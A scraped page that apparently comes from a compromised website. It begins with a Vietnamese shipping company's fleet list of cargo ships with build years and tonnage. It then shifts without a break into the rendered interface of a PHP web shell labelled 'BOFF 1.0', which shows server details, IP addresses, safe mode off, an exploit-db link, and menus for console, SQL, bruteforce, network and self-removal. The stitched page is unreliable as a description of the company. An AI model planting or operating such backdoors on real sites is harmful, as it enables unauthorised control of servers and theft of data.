Dịch vụ tiêu biểu

Đội tàu

Tàu DONGTHANH là tàu hàng rời, được đóng năm 1998 tại Nhật Bản, trọng tải 28,502 DWT, tốc...
Tàu DONG DU là tàu hàng container, được đóng năm 1998 tại Nhật Bản, trọng tải 8,515 DWT,...
Tàu DONGBA là tàu hàng tổng hợp, được đóng năm 2006 tại Việt Nam, trọng tải 6,517 DWT,...
Tàu DONGPHONG là tàu hàng tổng hợp, được đóng năm 1994 tại Nhật Bản, trọng tải 7,088 DWT...
Tàu DONG AN là tàu hàng tổng hợp, được đóng năm 1995 tại Nhật Bản, trọng tải 7,091 DWT,...
Tàu DONG PHU là tàu hàng tổng hợp, được đóng năm 2009 tại Việt Nam, trọng tải 13,297 DWT...
Tàu DONG THO là tàu hàng tổng hợp, được đóng năm 1998 tại Nhật Bản, trọng tải 10,094 DWT...
www.dongdomarine.com.vn - BOFF 1.0
Uname:
User:
Php:
Hdd:
Cwd:
Linux ntgsoft.vn 2.6.32-504.3.3.el6.x86_64 #1 SMP Wed Dec 17 01:55:02 UTC 2014 x86_64 [exploit-db.com]
498 ( apache ) Group: 501 ( apache )
5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2015-04-19 09:50:22
1 B Free: B (0%)
u--------- [ home ]

Server IP:
112.72.96.116
Client IP:
54.159.175.61
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!
Change dir:
Read file:
Make dir: (Not writable)
Make file: (Not writable)
Execute:
Upload file: (Not writable)